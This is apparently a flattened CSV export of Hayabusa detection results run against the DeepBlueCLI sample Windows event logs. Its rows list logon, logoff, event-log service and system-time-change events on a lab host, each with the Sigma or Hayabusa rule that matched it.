1162013-10-24 05:54:22.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1172013-10-24 05:54:23.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
1182013-10-24 05:54:29.619 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1192013-10-24 05:55:00.775 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1202013-10-24 05:55:00.775 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b15e | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1212013-10-24 05:55:00.775 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b18a | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1222013-10-24 05:55:00.775 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0x2b15erules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1232013-10-24 05:56:36.649 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1242013-10-24 06:05:37.180 +09:00IE8Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x2b18arules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1252013-10-24 06:06:17.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1262013-10-24 06:07:31.859 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1272013-10-24 06:07:33.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1282013-10-24 06:07:35.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
1292013-10-24 06:07:44.487 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1302013-10-24 06:13:38.283 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1312013-10-24 06:13:38.283 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x25519 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1322013-10-24 06:13:38.283 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2553c | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1332013-10-24 06:13:38.283 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0x25519rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1342013-10-24 06:35:27.028 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1352013-10-24 06:50:27.138 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: cifs/rdavis-7.sharplogic.localrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1362013-10-24 06:53:45.841 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1372013-10-24 06:53:45.841 +09:00IE8Win74624infoLogon Type 4 - BatchUser: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x15f454rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1382013-10-24 06:53:45.841 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0x15f454rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1392013-10-24 06:53:45.919 +09:00IE8Win74634infoLogoffUser: IEUser | LID: 0x15f454rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1402013-10-24 06:53:46.263 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1412013-10-24 06:53:46.263 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0x15f53arules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1422013-10-24 06:53:46.669 +09:00IE8Win74634infoLogoffUser: IEUser | LID: 0x15f546rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1432013-10-24 06:53:46.669 +09:00IE8Win74634infoLogoffUser: IEUser | LID: 0x15f53arules/hayabusa/default/events/Security/Logons/4634_Logoff.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1442013-10-24 06:54:01.732 +09:00IE8Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x2553crules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1452013-10-24 06:54:10.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1462013-10-24 06:55:25.000 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1472013-10-24 06:55:29.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1482013-10-24 06:55:32.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
1492013-10-24 06:55:35.625 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1502013-10-24 06:55:35.625 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdad4 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1512013-10-24 06:55:35.625 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0xdad4rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1522013-10-24 06:55:35.625 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xdafc | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1532013-10-24 06:55:37.450 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1542013-10-24 06:55:44.840 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1552013-10-24 06:55:44.840 +09:00IE8Win74624infoLogon Type 4 - BatchUser: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x13dbcrules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1562013-10-24 06:55:44.840 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0x13dbcrules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1572013-10-24 07:00:55.356 +09:00IE8Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0xdafcrules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1582013-10-24 07:00:55.903 +09:00IE8Win74634infoLogoffUser: IEUser | LID: 0xdafcrules/hayabusa/default/events/Security/Logons/4634_Logoff.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1592013-10-24 07:00:55.903 +09:00IE8Win74634infoLogoffUser: IEUser | LID: 0xdad4rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1602013-10-24 07:01:28.840 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1612013-10-24 07:01:28.840 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0x4bafcrules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1622013-10-24 07:01:28.840 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bafc | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1632013-10-24 07:01:28.840 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x4bb14 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1642013-10-24 07:04:16.809 +09:00IE8Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x4bb14rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1652013-10-24 07:04:18.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1662013-10-24 07:05:21.859 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1672013-10-24 07:05:25.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1682013-10-24 07:05:31.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
1692013-10-24 07:05:32.609 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1702013-10-24 07:05:32.609 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0xd99erules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1712013-10-24 07:05:32.609 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd99e | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1722013-10-24 07:05:32.609 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xd9c6 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1732013-10-24 07:05:36.944 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1742013-10-24 07:05:40.928 +09:00IE8Win74624infoLogon Type 4 - BatchUser: IEUser | Computer: IE8WIN7 | IP Addr: - | LID: 0x144dfrules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1752013-10-24 07:05:40.928 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1762013-10-24 07:05:40.928 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0x144dfrules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1772013-10-24 08:11:15.779 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1782014-11-22 08:29:47.424 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1792014-11-22 08:32:12.657 +09:00IE8Win74634infoLogoffUser: IEUser | LID: 0x144dfrules/hayabusa/default/events/Security/Logons/4634_Logoff.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1802014-11-22 08:34:00.063 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.localrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1812014-11-22 08:40:48.532 +09:00IE8Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0xd9c6rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1822014-11-22 08:41:16.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1832014-11-22 08:42:34.625 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1842014-11-22 08:42:37.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1852014-11-22 08:42:43.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
1862014-11-22 08:42:49.610 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1872014-11-22 08:43:06.625 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1882014-11-22 08:43:06.625 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0x16559rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1892014-11-22 08:43:06.625 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16559 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1902014-11-22 08:43:06.625 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x16589 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1912014-11-22 08:44:23.849 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1922014-11-22 09:44:32.677 +09:00IE8Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x16589rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1932014-11-22 10:43:32.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1942014-11-24 14:07:26.562 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1952014-11-24 14:07:37.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1962014-11-24 14:07:38.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
1972014-11-24 14:07:42.189 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1982014-11-24 14:08:08.126 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1992014-11-24 14:08:08.126 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0x2b7c0rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2002014-11-24 14:08:08.126 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7c0 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2012014-11-24 14:08:08.126 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7f0 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2022014-11-26 02:18:43.562 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2032014-11-26 02:25:02.877 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2042014-11-26 02:48:26.739 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2052014-11-26 02:57:33.848 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2062014-11-26 03:01:39.454 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2072014-11-26 03:02:36.847 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2082014-11-26 03:05:40.910 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.localrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2092014-11-26 06:49:55.313 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2102014-11-26 06:50:49.109 +09:00IE8Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x2b7f0rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2112014-11-26 06:51:44.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2122014-11-26 06:52:36.312 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2132014-11-26 06:52:38.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2142014-11-26 06:52:41.000 +09:00IE8WIN74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2152014-11-26 06:52:48.955 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2162014-11-26 06:54:52.158 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2172014-11-26 06:54:52.158 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0xcf564rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2182014-11-26 06:54:52.158 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf564 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2192014-11-26 06:54:52.158 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf598 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2202014-11-26 07:23:56.575 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2212014-11-26 07:26:20.278 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.localrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2222014-11-26 07:35:01.091 +09:00IE8Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0xcf598rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2232014-11-26 07:36:37.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2242014-11-26 07:38:20.765 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2252014-11-26 07:38:21.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2262014-11-26 07:38:22.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2272014-11-26 07:38:26.183 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2282014-11-26 07:38:48.104 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2292014-11-26 07:38:48.104 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0x27008rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
